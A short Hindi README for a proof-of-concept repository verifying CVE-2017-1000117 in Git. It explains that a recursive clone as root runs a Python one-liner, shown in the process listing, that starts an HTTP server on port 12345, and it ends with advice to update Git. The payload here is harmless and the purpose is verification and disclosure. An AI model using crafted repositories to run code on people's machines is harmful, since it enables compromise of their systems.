
CVE-2017-1000117 का सत्यापन
यह CVE-2017-1000117 भेद्यता पर काम करता है।
इस रिपॉजिटरी को root विशेषाधिकारों के साथ git कमांड में --recurse विकल्प देकर क्लोन करने पर, यह अपने आप 12345 पोर्ट पर सुनने वाला http सर्वर चला देता है।
http सर्वर को रोकने के लिए प्रक्रिया क्रमांक (PID) ढूंढें और kill करें।
CentOS7
macOS Sierra
Debian8
निम्नलिखित कमांड चलाएँ। पूरा होने पर कंसोल रुक जाएगा, इसलिए Ctrl + C से बाहर निकलें।
[root@localhost ~]$ git clone --recurse https://github.com/Shadow5523/CVE-2017-1000117-test.git
[root@localhost ~]$ ps ax | grep http
21365 pts/0 S 0:00 python -c (lambda j: (lambda s, i: s.setsockopt(i.SOL_SOCKET, i.SO_REUSEADDR, 1) or s.bind((i.gethostname(), 12345)) or s.listen(10) or map(lambda y: y.send("HTTP/1.0 200 OK\r\nContent-Length: 20\r\nContent-Type: text/html\r\n\r\n<html><center>test</center></html>"), (s.accept()[0] for x in iter(int, 1))))(j.socket(j.AF_INET, j.SOCK_STREAM), j))(__import__("socket"))
21381 pts/0 S+ 0:00 grep --color=auto ht
[root@localhost ~]$ netstat -tanp | grep 12345
tcp 0 0 127.0.0.1:12345 0.0.0.0:* LISTEN 21365/python
macOS पर निम्नलिखित कमांड से जाँचें:
MAcbook:~ root# lsof -nP -iTCP -sTCP:LISTEN
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
Python 14231 root 3u IPv4 0xa3955f2183c66251 0t0 TCP 127.0.0.1:12345 (LISTEN)
Git को नवीनतम संस्करण में अपडेट करें। नीचे दिए गए लिंक देखें।
GitHub रिमोट रिपॉजिटरी से नवीनतम Git में अपडेट करने की विधि